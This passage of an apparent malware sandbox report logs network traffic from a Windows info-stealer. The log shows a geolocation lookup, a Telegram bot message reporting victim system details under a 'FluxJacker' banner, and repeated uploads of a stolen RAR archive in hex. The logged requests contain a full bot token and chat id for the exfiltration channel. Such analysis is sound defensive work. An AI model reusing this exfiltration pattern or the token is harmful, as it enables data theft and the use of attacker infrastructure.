Oct 13, 2024 19:05:39.613693953 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:05:39.618669033 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:39.618707895 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:39.618741989 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:39.618829966 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:39.618841887 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:39.619142056 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:39.619153976 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:39.619179964 CEST	7000	49739	198.23.219.104	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 13, 2024 19:01:21.353698015 CEST	49278	53	192.168.2.4	1.1.1.1
Oct 13, 2024 19:01:21.361135960 CEST	53	49278	1.1.1.1	192.168.2.4
Oct 13, 2024 19:01:47.338709116 CEST	50563	53	192.168.2.4	1.1.1.1
Oct 13, 2024 19:01:47.346216917 CEST	53	50563	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 13, 2024 19:01:21.353698015 CEST	192.168.2.4	1.1.1.1	0xe8c	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Oct 13, 2024 19:01:47.338709116 CEST	192.168.2.4	1.1.1.1	0x3a31	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 13, 2024 19:01:21.361135960 CEST	1.1.1.1	192.168.2.4	0xe8c	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Oct 13, 2024 19:01:47.346216917 CEST	1.1.1.1	192.168.2.4	0x3a31	No error (0)	ip-api.com		208.95.112.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.telegram.org

ip-api.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49749	208.95.112.1	80	2892	C:\Users\user\Desktop\sB2ClgrGng.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 19:01:47.352235079 CEST	116	OUT	GET /json/?fields=225545 HTTP/1.1 Host: ip-api.com Accept-Encoding: identity User-Agent: python-urllib3/2.2.2
Oct 13, 2024 19:01:47.903525114 CEST	379	IN	HTTP/1.1 200 OK Date: Sun, 13 Oct 2024 17:01:47 GMT Content-Type: application/json; charset=utf-8 Content-Length: 202 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 33 33 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 7d Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-33.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.33"}

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49738	149.154.167.220	443	7280	C:\Users\user\AppData\Local\Temp\bound.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-13 17:01:22 UTC	465	OUT	GET /bot7151126433:AAGnFv8HooRtSQ_cEeb4ANUyyyQ1LbT0Ehc/sendMessage?chat_id=-1002219810475&text=%E2%98%A0%20%5BFluxJacker%20@mrfluxdev%5D%0D%0A%0D%0ANew%20CLient%20:%20%0D%0A75AB9E535C7E64F8DEDE%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%209FGY78%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroup%20:%20RK%20New%20Staup HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-10-13 17:01:22 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sun, 13 Oct 2024 17:01:22 GMT Content-Type: application/json Content-Length: 486 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-10-13 17:01:22 UTC	486	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 32 33 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 35 31 31 32 36 34 33 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 72 69 6b 67 72 61 62 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 72 6b 67 72 61 62 73 7a 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 31 30 30 32 32 31 39 38 31 30 34 37 35 2c 22 74 69 74 6c 65 22 3a 22 72 69 6b 67 72 61 62 73 22 2c 22 74 79 70 65 22 3a 22 73 75 70 65 72 67 72 6f 75 70 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 38 38 33 38 38 38 32 2c 22 74 65 78 74 22 3a 22 5c 75 32 36 32 30 20 5b 46 6c 75 78 4a 61 63 6b 65 72 20 40 6d 72 66 6c 75 78 64 65 76 5d 5c 6e 5c 6e Data Ascii: {"ok":true,"result":{"message_id":4231,"from":{"id":7151126433,"is_bot":true,"first_name":"rikgrabs","username":"rkgrabszbot"},"chat":{"id":-1002219810475,"title":"rikgrabs","type":"supergroup"},"date":1728838882,"text":"\u2620 [FluxJacker @mrfluxdev]\n\n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49750	149.154.167.220	443	2892	C:\Users\user\Desktop\sB2ClgrGng.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-13 17:01:48 UTC	268	OUT	POST /bot7151126433:AAGnFv8HooRtSQ_cEeb4ANUyyyQ1LbT0Ehc/sendDocument HTTP/1.1 Host: api.telegram.org Accept-Encoding: identity Content-Length: 718866 User-Agent: python-urllib3/2.2.2 Content-Type: multipart/form-data; boundary=eb9cccf662e2649c85fa5e8d1397dd63
2024-10-13 17:01:48 UTC	16384	OUT	Data Raw: 2d 2d 65 62 39 63 63 63 66 36 36 32 65 32 36 34 39 63 38 35 66 61 35 65 38 64 31 33 39 37 64 64 36 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 46 75 6e 64 65 76 2d 6a 6f 6e 65 73 2e 72 61 72 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 52 61 72 21 1a 07 01 00 23 6e bf e2 21 04 00 00 01 0f 54 49 49 97 6f a3 fa 32 54 09 a4 5e 68 06 25 17 5e a4 cb 2c 59 01 93 c2 c7 80 c1 96 2f ff 73 dd 34 2c dc 27 97 8c 90 e9 65 0f e9 1d c9 18 7b 75 1b d2 5e 19 bf 9c 15 a4 8a a0 98 80 1d a7 af 88 b4 b8 38 bc c3 77 e9 99 6c 50 09 aa e2 27 23 9a 09 Data Ascii: --eb9cccf662e2649c85fa5e8d1397dd63Content-Disposition: form-data; name="document"; filename="Fundev-user.rar"Content-Type: application/octet-streamRar!#n!TIIo2T^h%^,Y/s4,'e{u^8wlP'#
2024-10-13 17:01:48 UTC	16384	OUT	Data Raw: d8 98 b7 b4 4c 06 b9 26 6d 3e d8 04 f2 83 cb aa 11 f7 5c 56 d8 00 68 84 2b 69 32 bc 21 3e ec 9a 25 e9 ad e5 9d 35 89 a9 9b cb 55 1e 87 4d 0c 60 2e 18 54 cd f7 e1 a7 d7 da 9a cd 7b c9 3b 4b 39 37 77 41 e4 08 e7 0d 5d cc fe 0c ba 31 f4 ff f0 7e 46 0c 3d de 86 80 a3 54 b7 07 21 6c 4a 15 27 5f 33 2b 5c 85 8d c8 87 f9 95 1d 85 e5 65 7c 8e af b5 8a d5 42 0a 48 43 c5 9e ea 6b 7b 50 af d3 66 c7 e3 e6 24 02 eb c1 bb 85 9c 34 b1 8f b7 92 0d 41 97 71 fa 5b 66 26 25 63 c4 2c 39 01 1c ed 87 57 bc f1 56 94 93 50 d0 d9 b5 d1 35 49 f6 af 28 a8 da 68 ab 43 8e b5 4b 3e 4c 5b 57 ea e4 c5 28 fd 6f 01 39 76 dd 6b df 35 ba 1e e6 d6 ee 9f 78 4e c9 e5 bb a5 e0 ac a6 21 39 81 5d 30 8f ee dc d1 a9 c8 c0 0f 66 91 31 72 03 65 82 b5 47 66 ab 8f 4f a7 fc 94 58 58 9f d0 1f 29 ee 82 78 Data Ascii: L&m>\Vh+i2!>%5UM`.T{;K97wA]1~F=T!lJ'_3+\e\|BHCk{Pf$4Aq[f&%c,9WVP5I(hCK>L[W(o9vk5xN!9]0f1reGfOXX)x
2024-10-13 17:01:48 UTC	16384	OUT	Data Raw: 68 23 66 e5 3f 8e 31 f1 f7 30 83 4e 5f 8b 0d 31 ae 28 d6 64 c8 ae 8c f6 00 52 51 27 d2 2d 60 7f aa 20 f2 b5 14 0d 34 40 ef 49 d3 4e ae aa 08 a6 9e 5b c6 46 e1 1f 3a ff 9e 01 5f 88 da fe b2 e2 94 30 de e8 17 93 95 9f a8 d3 99 88 5a 71 86 aa f6 64 8c 69 98 e3 b9 d3 49 89 de f4 b8 48 7f fb 68 49 b5 e2 53 a8 07 4e 50 2f ab 30 93 1e 2e 88 6f cb 8c ed f6 f2 05 f2 7d 61 14 07 60 a3 8a 8e 4a 6e 03 9f 86 e5 1b 4a c3 4a 89 9d 63 82 55 12 0c 8e 2f 6f 6a be 46 a5 9a f7 e5 4e 00 0a f9 0d b1 05 2b 21 d7 69 d7 f2 2d dd 54 7f 80 15 0c 85 0c 58 8f 32 d1 3e 84 bd e1 65 ab 7c 26 f8 20 8b dc db 6f a8 0f 79 8f 37 cd 4d d1 e8 e8 ca 0c d1 2f 47 4e 60 37 1e 8b b9 a3 2e 80 4c a6 e2 61 3a 8a 6b f8 51 7f a2 fe 52 87 9b 68 2a d0 0e b4 d1 4a aa 16 98 1d 96 f2 4f 5e 41 e0 42 fb 41 9b Data Ascii: h#f?10N_1(dRQ'-` 4@IN[F:_0ZqdiIHhISNP/0.o}a`JnJJcU/ojFN+!i-TX2>e\|& oy7M/GN`7.La:kQRh*JO^ABA
2024-10-13 17:01:48 UTC	16384	OUT	Data Raw: cf 88 7d 86 8b b3 65 e1 92 90 db c0 64 89 cb 96 8e b2 6a 1a 2c de 11 fc 87 0d d7 bc 7e ee 9c 2b e9 11 cc f5 45 b8 ab 85 64 d0 4f 33 ed 91 59 ef 61 82 f2 df 79 f4 5a 3b 47 b4 fa 3f 20 40 e1 a0 3b de e2 a9 bb 0a a5 0d 55 a7 8d 66 a4 73 44 a1 5d 0a 37 04 bb 27 8b 75 1f 6b b6 c2 93 20 33 d5 35 be ed 74 f1 a5 9f 55 a4 31 bb b2 87 25 21 cd 86 2a 54 f5 f6 d2 e7 f6 2b e6 98 1b 15 f7 78 89 dc 23 b2 07 a8 98 5b 77 10 f3 72 f4 26 33 9b 45 ee a6 2a ae fa 87 95 d5 88 1b 17 81 d4 bc 3f 1e aa e7 56 b8 a4 2d 06 ef 99 8d bb 39 c1 42 af 60 87 dd bb 38 17 6f c7 d5 bc 22 33 50 1a bf af a7 13 4f 8b 19 97 08 51 69 f5 27 b5 56 f4 bb a0 3b 52 9d 38 e4 34 75 4a 94 20 28 1c 68 32 2d c3 0d 78 52 1a ac 24 b1 22 f0 b7 f1 bf 77 8a 96 b7 04 cc 8a 56 98 63 f9 67 af 3d e8 8c f6 d1 f7 3e Data Ascii: }edj,~+EdO3YayZ;G? @;UfsD]7'uk 35tU1%!T+x#[wr&3E?V-9B`8o"3POQi'V;R84uJ (h2-xR$"wVcg=>
2024-10-13 17:01:48 UTC	16384	OUT	Data Raw: 5d 13 63 af 3b 92 05 6b 73 ef 53 28 b3 7c f2 2c f6 a5 1e 52 9a d9 7b 97 16 09 4e 57 5b 6e 6f 51 55 63 aa ee 9c 06 7e f3 1d ee 48 d8 e7 47 21 af f9 17 d7 d4 69 26 16 3b 0c e3 06 47 61 8d fa 00 2b 8e 4e 4f 60 2b b9 80 0a 8c f8 31 59 c4 32 41 07 2f 59 d3 91 76 65 4e eb fd ff 89 c9 02 a6 5f d2 a9 ee ee 88 e4 51 20 90 89 d3 b5 36 e5 48 11 4c 5e 73 66 64 e4 1b 29 3b 38 24 0d b6 77 51 06 8c 6b d2 0e cc d9 46 14 bd f7 3f a9 b5 12 a8 83 2a f6 f8 ee 56 59 f6 b9 88 fa 91 a4 f0 91 a0 44 f3 e3 47 78 37 65 1b f8 2e 0d 03 61 21 50 78 77 ba 16 60 d3 19 e3 de 26 88 17 66 ba 7f 7b 38 9a dc cc 75 2a c6 f7 c3 ab a3 19 1b 8d a3 32 53 0c 49 3f 67 cc f0 97 30 10 36 ae bb a6 55 79 15 4b b0 1a 5d 27 7d 4b 35 61 78 93 a2 f1 6c 4e 32 00 67 30 4c b8 6f 40 e4 a7 67 5a cd be a0 08 c4 Data Ascii: ]c;ksS(\|,R{NW[noQUc~HG!i&;Ga+NO`+1Y2A/YveN_Q 6HL^sfd);8$wQkF?VYDGx7e.a!Pxw`&f{8u2SI?g06UyK]'}K5axlN2g0Lo@gZ
2024-10-13 17:01:48 UTC	16384	OUT	Data Raw: 97 f8 da 76 bd 17 4e b3 b1 ac 79 d1 62 4f 51 d6 35 6e f9 30 f2 11 64 c3 6f 11 f2 9d a2 e9 f7 28 68 4e 01 d3 52 23 8a 65 59 09 fc fe 67 b6 3c 24 95 0d ad 06 27 6b f7 18 2a 2d fe c5 4f 6e 8c 7e 63 0a 11 e4 8c 89 e0 1d 09 80 02 c8 36 1b bd 3d 04 e5 07 be 03 d6 bb d2 34 44 8e ac 62 af 2c aa dd 83 9a e3 8c b4 0a 1e 0d 38 68 a9 cb 82 e9 76 57 7d e5 f5 2c 56 ff 4c da bc 60 b1 2c d7 85 05 a9 b8 28 99 9c f1 8c 4c f7 87 d0 79 c9 45 68 1e a4 44 af 97 7c f9 5c 76 e6 e1 d6 e7 67 51 2d 45 6b ca c6 3f 0e 83 88 f1 44 dc 80 f3 9f d6 61 cf 24 c9 ea 8c ac 48 42 72 99 89 99 80 8d bb d8 5b 7a b8 93 db 97 38 18 06 03 c2 45 8c 51 1f 7a f2 5f cc 7b 24 76 4b 5c 10 7c ef be c5 d0 88 f4 30 34 2a 4d dd 93 65 42 f8 c1 b6 91 df b5 76 f4 ad a8 63 17 5e e0 25 56 d9 ce b5 3e 0e c3 cd 66 Data Ascii: vNybOQ5n0do(hNR#eYg<$'k-On~c6=4Db,8hvW},VL`,(LyEhD\|\vgQ-Ek?Da$HBr[z8EQz_{$vK\\|04MeBvc^%V>f
2024-10-13 17:01:48 UTC	16384	OUT	Data Raw: 4e b7 8f e5 fa ae 44 10 e9 58 d3 8f f2 61 00 b2 75 d0 03 a4 ce f7 1e 6b b1 f4 58 9f a8 8a 6f 5c 11 33 f7 c9 d4 fc 0c 91 ff 13 d1 1d ff be a9 31 8e 74 a4 a6 07 44 70 b0 e7 e9 aa 2b 29 52 cd a8 5b 5e f9 2e de 39 21 08 37 eb c4 9d e0 4a 74 16 06 5f 2a fd a1 e6 db 85 45 ef f7 91 3a cc 20 a3 9d 06 df a0 86 e0 91 b6 ab cb e8 e6 d1 ea d3 ec e6 3d d9 24 d5 b7 06 29 03 2d 4f 5d dc 72 51 c3 af 40 e9 0e d2 5d 38 6f 73 ef 66 ee d4 e5 44 fa 81 5b 64 6a 74 e5 54 20 da 4d 85 a4 12 e6 f3 b3 d5 08 19 ca 0a b3 d6 f8 1b 60 f3 fc d0 32 2c c9 ac eb 6b 0e 6a d8 9f 0b fd 78 51 a7 4b cf 1c 54 d5 fb 8e 50 37 04 4b 62 d2 29 4e 3b 25 97 10 35 4b f9 72 28 ba c1 57 8f 6b 6b 4a 59 4f 77 22 67 51 83 db 48 1d cd 85 34 d4 52 40 ad b3 87 c6 f6 b5 53 ec 2d 90 93 04 79 70 77 dd f9 4f 59 d9 Data Ascii: NDXaukXo\31tDp+)R[^.9!7Jt_*E: =$)-O]rQ@]8osfD[djtT M`2,kjxQKTP7Kb)N;%5Kr(WkkJYOw"gQH4R@S-ypwOY
2024-10-13 17:01:48 UTC	16384	OUT	Data Raw: f4 55 f5 04 8b e7 aa 08 19 cd 77 cb 02 16 4b 95 47 10 de 87 2f 68 8c 43 92 65 2d 0f 04 fb d2 79 2a b1 2a 71 96 a6 d7 4a 08 15 ee 54 26 89 43 b4 e2 e6 87 e6 1d 56 e7 ea 75 19 5b a9 e1 06 da a7 6d 56 6a f3 92 4b eb a1 23 56 dc 06 a8 dd 4c a7 1b e0 15 3f 42 2d e6 37 c6 21 3f 62 f6 ed a5 ec b3 0b 55 74 1b fb 9b f6 91 5c 19 ab 87 6f 87 87 fe 57 64 43 1d 90 4c c7 8c b4 4d 9a 97 a9 04 5a b7 17 3f b1 8a 2b bb 92 62 d7 e5 05 12 0a c5 64 80 d2 e4 7b 45 49 fa ba af b5 fc 44 be af 9e a7 1b 2c b3 b2 d9 c4 a8 4b 30 2b f1 66 84 0f 97 10 1c 54 16 03 ee ff 8b aa 82 00 1d 80 df 11 6d 9b fe e9 f2 bb b0 a2 e3 0d 9c e7 0d 11 f4 63 43 4c 2f 63 9a 91 e1 ec 9a 18 35 b8 0b 35 f4 e2 97 30 5a 20 d8 b8 58 99 d2 48 3b 7a cf e5 23 c5 79 1f aa 62 fc 06 c2 29 e2 df 9f 25 fb e6 32 5e 5f Data Ascii: UwKG/hCe-y**qJT&CVu[mVjK#VL?B-7!?bUt\oWdCLMZ?+bd{EID,K0+fTmcCL/c550Z XH;z#yb)%2^_
2024-10-13 17:01:48 UTC	16384	OUT	Data Raw: 9d 57 f6 e7 27 cc 2b dd 8b 92 33 39 d8 91 ad 23 ae 00 5e c5 74 e6 85 e2 a7 03 f2 3b 9d 61 6a cb f4 d0 1c 7d ba 32 ac 25 94 46 00 c9 70 06 84 e8 47 61 12 94 18 6b ce 67 6a f4 06 2e 5a d7 98 bc af c1 1e 33 c1 ab b8 e5 a6 7b ce 11 90 0d bb 51 de f5 5b 6a 29 7e 88 4b 21 d3 a3 22 a0 07 ef 27 42 36 36 48 29 91 80 76 43 46 e2 6e 72 27 8d 54 01 37 f2 2b e8 f8 18 95 00 5f 32 f7 62 03 bc 52 07 c2 fa 94 ef 2c f8 5b 07 21 c4 6c 4f 2e 87 b7 c1 6c 02 08 92 e0 7f c2 f8 06 ee f5 38 97 38 ef 4c fd f7 d9 d7 f5 e0 77 62 b4 e3 45 95 eb b7 07 e3 2c a6 b2 f5 6a 0f 5a aa f0 13 21 5a 30 ee d1 f7 c4 fd 80 26 67 9d 7c 6f 70 3c 70 78 8f 09 24 5e 2e e8 b9 bc b9 57 72 f1 49 dc 95 31 39 34 c0 8a a5 9f e8 ef fd b9 68 9c c5 1a 43 0f 52 82 4f 42 f5 e8 6d 5e ac 1c 3a b1 7d 52 83 b4 60 04 Data Ascii: W'+39#^t;aj}2%FpGakgj.Z3{Q[j)~K!"'B66H)vCFnr'T7+_2bR,[!lO.l88LwbE,jZ!Z0&g\|op<px$^.WrI194hCROBm^:}R`
2024-10-13 17:01:48 UTC	16384	OUT	Data Raw: 79 e9 6a 12 a0 b0 fc 6c 38 47 0c 17 54 75 35 c8 47 1a 39 2c 62 01 6d a5 9d 65 6e c2 dd bb cb 78 e8 53 b5 29 28 96 95 0f fa ce bb 91 80 2c da 9e 76 f5 0a b6 b6 e7 de 41 55 e2 c0 f8 ec f2 a8 01 af fc 38 0e c7 ea 11 d0 4a c5 c9 af 9f b5 5e 2f 59 92 76 b1 73 5f 38 c2 6b d8 03 66 fc cb e5 60 3a da f6 18 19 4e 03 c0 77 1a e4 23 c4 c8 8a 6a 92 8b 12 af 83 39 48 9a 71 9c d0 e6 a9 31 9e 7f ea 74 36 ae 4e de 51 c2 d7 ed b1 62 10 06 03 c2 0d 61 f6 5f cb 99 29 2e e6 1c f0 5b a4 9c 3f a1 3f 13 29 30 74 9e a4 f9 cb 14 1c d6 c4 a9 35 fa 4c dd 4a 38 35 b2 27 f3 21 19 c2 c4 24 44 e9 d8 ce 0e 39 bb 56 22 38 4a 23 63 e6 4c 69 89 1a 22 8d 19 55 bf ee 36 79 9c 37 e1 40 4d d9 d2 c1 0f 0f 5f 9c 0a 5b 6b b0 f5 f8 db 31 43 0e 81 e2 8f 77 fe 7a 22 fc 12 78 bc 1c 13 a0 c0 4b 3b 57 Data Ascii: yjl8GTu5G9,bmenxS)(,vAU8J^/Yvs_8kf`:Nw#j9Hq1t6NQba_).[??)0t5LJ85'!$D9V"8J#cLi"U6y7@M_[k1Cwz"xK;W
2024-10-13 17:01:50 UTC	389	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sun, 13 Oct 2024 17:01:50 GMT Content-Type: application/json Content-Length: 1660 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49751	149.154.167.220	443	2892	C:\Users\user\Desktop\sB2ClgrGng.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-13 17:01:51 UTC	268	OUT	POST /bot7151126433:AAGnFv8HooRtSQ_cEeb4ANUyyyQ1LbT0Ehc/sendDocument HTTP/1.1 Host: api.telegram.org Accept-Encoding: identity Content-Length: 718861 User-Agent: python-urllib3/2.2.2 Content-Type: multipart/form-data; boundary=e0ec0acbd56620af43602a9b073e8d82
2024-10-13 17:01:51 UTC	16384	OUT	Data Raw: 2d 2d 65 30 65 63 30 61 63 62 64 35 36 36 32 30 61 66 34 33 36 30 32 61 39 62 30 37 33 65 38 64 38 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 46 75 6e 64 65 76 2d 6a 6f 6e 65 73 2e 72 61 72 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 52 61 72 21 1a 07 01 00 23 6e bf e2 21 04 00 00 01 0f 54 49 49 97 6f a3 fa 32 54 09 a4 5e 68 06 25 17 5e a4 cb 2c 59 01 93 c2 c7 80 c1 96 2f ff 73 dd 34 2c dc 27 97 8c 90 e9 65 0f e9 1d c9 18 7b 75 1b d2 5e 19 bf 9c 15 a4 8a a0 98 80 1d a7 af 88 b4 b8 38 bc c3 77 e9 99 6c 50 09 aa e2 27 23 9a 09 Data Ascii: --e0ec0acbd56620af43602a9b073e8d82Content-Disposition: form-data; name="document"; filename="Fundev-user.rar"Content-Type: application/octet-streamRar!#n!TIIo2T^h%^,Y/s4,'e{u^8wlP'#
2024-10-13 17:01:51 UTC	16384	OUT	Data Raw: d8 98 b7 b4 4c 06 b9 26 6d 3e d8 04 f2 83 cb aa 11 f7 5c 56 d8 00 68 84 2b 69 32 bc 21 3e ec 9a 25 e9 ad e5 9d 35 89 a9 9b cb 55 1e 87 4d 0c 60 2e 18 54 cd f7 e1 a7 d7 da 9a cd 7b c9 3b 4b 39 37 77 41 e4 08 e7 0d 5d cc fe 0c ba 31 f4 ff f0 7e 46 0c 3d de 86 80 a3 54 b7 07 21 6c 4a 15 27 5f 33 2b 5c 85 8d c8 87 f9 95 1d 85 e5 65 7c 8e af b5 8a d5 42 0a 48 43 c5 9e ea 6b 7b 50 af d3 66 c7 e3 e6 24 02 eb c1 bb 85 9c 34 b1 8f b7 92 0d 41 97 71 fa 5b 66 26 25 63 c4 2c 39 01 1c ed 87 57 bc f1 56 94 93 50 d0 d9 b5 d1 35 49 f6 af 28 a8 da 68 ab 43 8e b5 4b 3e 4c 5b 57 ea e4 c5 28 fd 6f 01 39 76 dd 6b df 35 ba 1e e6 d6 ee 9f 78 4e c9 e5 bb a5 e0 ac a6 21 39 81 5d 30 8f ee dc d1 a9 c8 c0 0f 66 91 31 72 03 65 82 b5 47 66 ab 8f 4f a7 fc 94 58 58 9f d0 1f 29 ee 82 78 Data Ascii: L&m>\Vh+i2!>%5UM`.T{;K97wA]1~F=T!lJ'_3+\e\|BHCk{Pf$4Aq[f&%c,9WVP5I(hCK>L[W(o9vk5xN!9]0f1reGfOXX)x
2024-10-13 17:01:51 UTC	16384	OUT	Data Raw: 68 23 66 e5 3f 8e 31 f1 f7 30 83 4e 5f 8b 0d 31 ae 28 d6 64 c8 ae 8c f6 00 52 51 27 d2 2d 60 7f aa 20 f2 b5 14 0d 34 40 ef 49 d3 4e ae aa 08 a6 9e 5b c6 46 e1 1f 3a ff 9e 01 5f 88 da fe b2 e2 94 30 de e8 17 93 95 9f a8 d3 99 88 5a 71 86 aa f6 64 8c 69 98 e3 b9 d3 49 89 de f4 b8 48 7f fb 68 49 b5 e2 53 a8 07 4e 50 2f ab 30 93 1e 2e 88 6f cb 8c ed f6 f2 05 f2 7d 61 14 07 60 a3 8a 8e 4a 6e 03 9f 86 e5 1b 4a c3 4a 89 9d 63 82 55 12 0c 8e 2f 6f 6a be 46 a5 9a f7 e5 4e 00 0a f9 0d b1 05 2b 21 d7 69 d7 f2 2d dd 54 7f 80 15 0c 85 0c 58 8f 32 d1 3e 84 bd e1 65 ab 7c 26 f8 20 8b dc db 6f a8 0f 79 8f 37 cd 4d d1 e8 e8 ca 0c d1 2f 47 4e 60 37 1e 8b b9 a3 2e 80 4c a6 e2 61 3a 8a 6b f8 51 7f a2 fe 52 87 9b 68 2a d0 0e b4 d1 4a aa 16 98 1d 96 f2 4f 5e 41 e0 42 fb 41 9b Data Ascii: h#f?10N_1(dRQ'-` 4@IN[F:_0ZqdiIHhISNP/0.o}a`JnJJcU/ojFN+!i-TX2>e\|& oy7M/GN`7.La:kQRh*JO^ABA
2024-10-13 17:01:51 UTC	16384	OUT	Data Raw: cf 88 7d 86 8b b3 65 e1 92 90 db c0 64 89 cb 96 8e b2 6a 1a 2c de 11 fc 87 0d d7 bc 7e ee 9c 2b e9 11 cc f5 45 b8 ab 85 64 d0 4f 33 ed 91 59 ef 61 82 f2 df 79 f4 5a 3b 47 b4 fa 3f 20 40 e1 a0 3b de e2 a9 bb 0a a5 0d 55 a7 8d 66 a4 73 44 a1 5d 0a 37 04 bb 27 8b 75 1f 6b b6 c2 93 20 33 d5 35 be ed 74 f1 a5 9f 55 a4 31 bb b2 87 25 21 cd 86 2a 54 f5 f6 d2 e7 f6 2b e6 98 1b 15 f7 78 89 dc 23 b2 07 a8 98 5b 77 10 f3 72 f4 26 33 9b 45 ee a6 2a ae fa 87 95 d5 88 1b 17 81 d4 bc 3f 1e aa e7 56 b8 a4 2d 06 ef 99 8d bb 39 c1 42 af 60 87 dd bb 38 17 6f c7 d5 bc 22 33 50 1a bf af a7 13 4f 8b 19 97 08 51 69 f5 27 b5 56 f4 bb a0 3b 52 9d 38 e4 34 75 4a 94 20 28 1c 68 32 2d c3 0d 78 52 1a ac 24 b1 22 f0 b7 f1 bf 77 8a 96 b7 04 cc 8a 56 98 63 f9 67 af 3d e8 8c f6 d1 f7 3e Data Ascii: }edj,~+EdO3YayZ;G? @;UfsD]7'uk 35tU1%!T+x#[wr&3E?V-9B`8o"3POQi'V;R84uJ (h2-xR$"wVcg=>
